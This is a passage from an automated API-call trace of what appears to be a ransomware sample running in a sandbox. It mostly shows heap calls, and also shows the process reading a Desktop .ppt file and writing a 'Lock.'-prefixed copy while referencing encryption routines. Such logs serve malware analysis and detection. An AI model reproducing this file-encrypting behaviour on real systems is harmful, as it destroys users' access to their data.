RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0137.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0137.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0137.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0137.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0137.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0137.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0137.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0137.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0137.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0137.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0137.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0137.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0137.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0137.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0137.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0137.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0137.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0137.720] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0137.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0137.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0137.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f05008 [0137.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0137.721] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/aycVRCc36.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\aycvrcc36.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0137.721] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.721] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0137.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0137.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0137.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0137.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0137.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0137.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0137.722] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0137.722] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0137.722] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0137.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0137.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0137.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0137.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.722] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0137.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0137.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0137.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0137.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f15010 [0137.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0137.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0137.723] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.aycVRCc36.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.aycvrcc36.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0138.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0138.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0138.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0138.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0138.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0138.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0138.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0138.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0138.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0138.563] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0138.792] TranslateMessage (lpMsg=0x8cf708) returned 0 [0138.792] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0138.793] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0138.793] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0138.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0138.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0138.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0138.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0138.793] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0138.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0138.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0138.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0138.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0138.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0138.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0138.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0138.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0138.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3be7020 [0138.797] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0138.797] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f05008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f05008*, lpNumberOfBytesRead=0x8cf4f8*=0xffed, lpOverlapped=0x0) returned 1 [0138.801] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f05008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f05008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0138.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0138.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0138.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0138.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0138.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xffed) returned 0x2f25018 [0138.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be7020 | out: hHeap=0x970000) returned 1 [0138.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0138.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0138.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0138.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0138.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0138.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0138.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0138.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0138.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xffed) returned 0x2f35010 [0138.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f25018 | out: hHeap=0x970000) returned 1 [0138.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0138.809] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0138.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0138.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0138.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0138.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0138.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xffed) returned 0x2f25018 [0138.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0138.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f25018 | out: hHeap=0x970000) returned 1 [0138.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0138.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0138.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0138.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0138.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0138.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0138.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0138.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0138.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0138.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0138.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0138.812] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0138.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0138.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0138.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xffed) returned 0x2f25018 [0138.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0138.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 